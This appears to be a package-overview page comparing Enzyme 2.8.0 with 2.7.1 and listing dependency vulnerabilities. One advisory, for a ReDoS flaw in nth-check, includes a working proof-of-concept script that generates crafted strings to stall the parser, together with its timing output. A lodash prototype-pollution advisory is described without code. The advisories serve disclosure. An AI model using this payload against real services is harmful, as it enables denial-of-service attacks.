Enzyme is a widely adopted JavaScript testing utility specifically designed for simplifying React component testing. Version 2.8.0 builds upon the solid foundation of 2.7.1, offering subtle improvements without introducing breaking changes in dependencies. Both share identical core dependencies like Cheerio, Lodash, and Object.assign ensuring a consistent and reliable environment for simulating user interactions and asserting component behavior.
For developers, this means upgrading to version 2.8.0 is generally a safe and straightforward process. The peer dependency on React remains the same, supporting a wide range of React versions from 0.13.x, 0.14.x, and versions 15.0.0 and above. This compatibility helps in integrating the library smoothly across different React projects.
The development dependencies remain consistent, indicating a continued commitment to quality assurance and a stable development workflow. Libraries like Babel, ESLint, Mocha, and Webpack are used to build, test, and lint the library. While there are minor differences in the release date, from January 22 to March 25, these only means that version 2.8.0 includes the latest bug fixes and internal improvements, that build upon the already stable version 2.7.1. Making newer releases more reliable. Ultimately, sticking to a consistent testing strategy with Enzyme ensures React applications are robust and maintainable.
All the vulnerabilities related to the version 2.8.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.